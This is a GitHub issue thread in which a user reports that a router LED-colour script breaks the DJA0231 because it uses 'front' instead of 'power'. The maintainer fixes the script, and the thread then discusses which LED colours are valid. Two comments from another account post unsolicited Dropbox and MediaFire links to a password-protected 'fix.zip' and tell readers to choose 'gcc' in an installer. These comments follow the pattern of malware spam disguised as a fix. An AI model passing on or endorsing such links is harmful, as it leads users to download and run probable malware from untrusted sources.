### ISSUE TITLE
possible bug in set-led-colour Script

### ISSUE THREAD

**Issue by Justin8428** [seud0nym/tch-gui-unhide#210]
Hi, there appears to be a bug in the `set-led-colour` script used to change the led colour of DJA0231 while in bridged mode.
Currently after applying the script, after a reboot the device front led turns off. The device also appears to be inaccessible via ssh or the web interface requiring a full factory reset via the reset button, reloading firmware, rerooting etc.

The device DJA0231 is currently running firmware version `20.3.c.0501-MR22.1-RA`

Manually opening `/rom/etc/ledfw/stateMachines.lua` suggests that the option in the `staticLed()` function is now `power` instead of `front`. i.e. before editing, the file looks something like this: (to make it more readable here I replaced some options with <...>)

```
stateMachines = {
   power = { <...>  }, 
   actions = { <...>,
       bridge_online = { # line 163
           staticLed("power:red", false),
           staticLed("power:green", 5),
           staticLed("power:blue", false),
       },
       bridge_offline = {
           staticLed("power:red", true),
           staticLed("power:green", false),
           staticLed("power:blue", false),
       },
   }
},
```

Whereas the `set-led-colour` script appears to be looking for a `front` option:
`      /blue/a\           staticLed\(\"front:$COLOUR\", true\),`

For example, manually editing the `/etc/ledfw/stateMachines.lua` file by replacing `staticLed("power:red", true)` with `staticLed("power:red", false)` and `staticLed("power:green", false)` with `staticLed("power:green", 5)` under `bridge_offline` and rebooting successfully changes the LED colour to green. 

I'm guessing that the number doesn't really matter and could also probably be replaced by `true`, I just noticed a comment in the file which suggested Technicolor lowered the brightness to fix some hardware issue:
`staticLed("power:blue", 5),  -- Decrease brightness because of hardware issue.`

Thanks!

(P.S. another thing I've noticed is after running `tch-gui-unhide`, for whatever reason the GUI option to set the LED brightness appears to only work on the back LEDs, not the front LED)

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seud0nym** [comment]
Thanks for the report. 

Yes, `front` is only applicable to the Gen 3, and you are correct that it should be `power` for the DJA0231. I obviously didn't test that very well :-(

I have updated the script, and it will also check for that hardware issue and use 5 instead of true if found.

> another thing I've noticed is after running `tch-gui-unhide`, for whatever reason the GUI option to set the LED brightness appears to only work on the back LEDs, not the front LED

The stock GUI doesn't change the brightness of the front LED on a DJA0231, either. I have played with it, but I couldn't make it work reliably.

**Comment by Justin8428** [comment]
Thanks for fixing that -- the script appears to work correctly now!

A minor point, reading through `stateMachines.lua` it appears that for the Gen 2 DJA0231 cyan and magenta are not valid colours. The only colours that seem to be referenced are `blue green orange red white`. I wonder if its worth putting some sort of check in the script to check for the model for valid options (at least until the valid colours are confirmed), or maybe some sort of warning in the README.

I could try to put in a PR later for this if I get time but my bash scripting skills are not as good as they used to be..... :-D

Thanks again!

**Comment by seud0nym** [comment]
The way to check for valid colors is with this command:
```
ls -d /sys/class/leds/power* | cut -d: -f2
```

I have just put my test DJA0231 away, but my DJA0230 returns:
```
blue
cyan
green
magenta
orange
red
white
```

**Comment by Justin8428** [comment]
You're right -- the same colours are valid on DJA0231, also I tested magenta and it works.

Thanks again!
